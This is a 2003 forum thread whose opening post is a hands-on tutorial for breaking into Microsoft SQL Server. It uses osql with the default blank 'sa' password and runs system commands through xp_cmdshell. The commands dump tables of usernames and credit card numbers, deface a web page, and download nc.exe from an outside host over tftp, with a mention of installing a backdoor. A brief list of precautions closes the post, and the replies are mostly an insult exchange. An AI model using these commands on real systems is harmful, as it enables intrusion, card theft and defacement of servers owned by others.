Go Back   Computer Forums > General Computing > Cyber Safety and Computer Security
Click Here to Login
Join Computer forums Today


Reply
 
Thread Tools Search this Thread Display Modes
 
Old 05-24-2003, 06:24 PM   #1
 
Join Date: May 2003
Posts: 56
Default Breaking a SQL database Part 2

Part 2

Code:
C:>osql.exe -?
osql: unknown option ?
usage: osql              [-U login id]          [-P password]
  [-S server]            [-H hostname]          [-E trusted connection]
  [-d use database name] [-l login timeout]     [-t query timeout]
  [-h headers]           [-s colseparator]      [-w columnwidth]
  [-a packetsize]        [-e echo input]        [-I Enable Quoted Identifiers]
  [-L list servers]      [-c cmdend]
  [-q "cmdline query"]   [-Q "cmdline query" and exit]
  [-n remove numbering]  [-m errorlevel]
  [-r msgs to stderr]    [-V severitylevel]
  [-i inputfile]         [-o outputfile]
  [-p print statistics]  [-b On error batch abort]
  [-O use Old ISQL behavior disables the following]
      <EOF> batch processing
      Auto console width scaling
      Wide messages
      default errorlevel is -1 vs 1
  [-? show syntax summary]

------------------------------------------------

Well.. this displays the help of the osql tool ... Its clear from the help what we have to do now. Type

C:\> osql.exe -S 123.321.123.3 -U sa -P " "
1>
Thats what we get if we login successfully else we will get an error message as login failed for user "sa" ...

Now if you want to execute any command on the remote machine then just use the "xp_cmdshell" default stored procedure ...

C:\> osql.exe -S 123.321.123.3 -U sa -P '' -Q "exec master..xp_cmdshell ‘dir >dir.txt’"

I would prefer to use -Q option instead of -q because it exits after executing the query ... In the same manner we can execute any command on the remote machine ... We can even upload or download any files on/from the remote machine ...

A smart attacker will install a backdoor on the machine to gain access to in future also . Now as I had explained earlier we can use the "information_schema.tables" to get the list of tables and contents of it ...

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from information_schema.tables"

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select * from users"

And

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "select username, creditcard, expdate from users"

Code:
Output:

Username          Some Numbers ?                  expdate
-----------      ------------                   ----------
David Lindon     1234567890987654         2004-10-03 00:00:00.000
Overlord         0987654321234567         2004-07-02 00:00:00.000
jasynder         2312345678909878         2004-08-07 00:00:00.000
Eyelfixit        3456789012345678         2004-03-02 00:00:00.000
Write something in index.html file ?

C:\> osql.exe -S 123.321.123.3 -U sa -P " " -Q "exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’"

Want to upload any file on the remote system ...

C:\> osql.exe -S 198.188.178.1 -U sa -P " " -Q "exec master..xp_cmdshell ‘tftp 234.432.12.21 GET nc.exe c:\nc.exe’"

Precautionay measures
---------------------------
Code:
<*>    Change the default password for sa. 
<*>    Delete all the default stored procedures.
<*>    Filter out all the characters like ',",--,:,etc.  
<*>    Keep upto date with  patches
<*>    Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls ...

Sincerely
Courtney_DS
__________________

CourtneyDS is offline   Reply With Quote
Old 06-02-2003, 07:56 PM   #2
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

do it up girlfriend, will take me some practice but ill get it. gotta modify it but its a fukin kick arse code
__________________

webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:24 PM   #3
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Old, redundant information excite's you?
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:28 PM   #4
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

you cant do it beioch, you dont even know what it is n ur tryin to act like you do! jus shut up dude cuz ur a fool!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:45 PM   #5
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundat information to look good then I will say something.


Sorry, ahahahahahahahahaha
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 08:49 PM   #6
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
No, I think not. Again you are no one to tell me what to do. Oh and if courtneyBS keeps putting up old, redundat information to look good then I will say something.


Sorry, ahahahahahahahahaha
say somethin, you aint sayin sheoit, all ur doin is copyin from other sites, you dont know nothin n peeps can see that dude. ur not doin good makin urself look like ur important! go find a girl dude cuz this aint ur bag, ur ignorant bro!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 08:56 PM   #7
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especialy by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 09:00 PM   #8
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
Meager, weak argument.

I will not leave.

I do not think I'm better than the next guy/girl.

I will not be told (especialy by you) what to do or say.

I am not here to feel important or look good. Frankly I don't really care what people think of me.

Try again, this isn't working so well for you.

nobody cares what you think dude. you aint no admin on lti cuz you cant be trusted! courts n her boys busted ur arse up deleting all ur posts n ur dumb! nobody wants sheoit to work against you bro, ur makin more a fool of yourself wit every post you make!
webcamguy is offline   Reply With Quote
Old 06-02-2003, 09:06 PM   #9
In Runtime
 
eyelfixit's Avatar
 
Join Date: Mar 2003
Posts: 120
Default

I was just telling other people that what you say is false. that's all.
__________________
BC Save website: http://www.bcsave.com

BC Save Forum: http://www.bcsave.com/forum

Co-author of:
http://powerbook.bcsave.com
eyelfixit is offline   Reply With Quote
Old 06-02-2003, 09:10 PM   #10
Baseband Member
 
Join Date: May 2003
Posts: 35
Default

Quote:
Originally posted by eyelfixit
I was just telling other people that what you say is false. that's all.

ah ha ha ha, there are peeps postin code that can be altered real quick n ur postin cut and paste crap. give it a rest bro unless you like makin a fool of urself.
__________________

webcamguy is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT -5. The time now is 11:29 PM.


Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0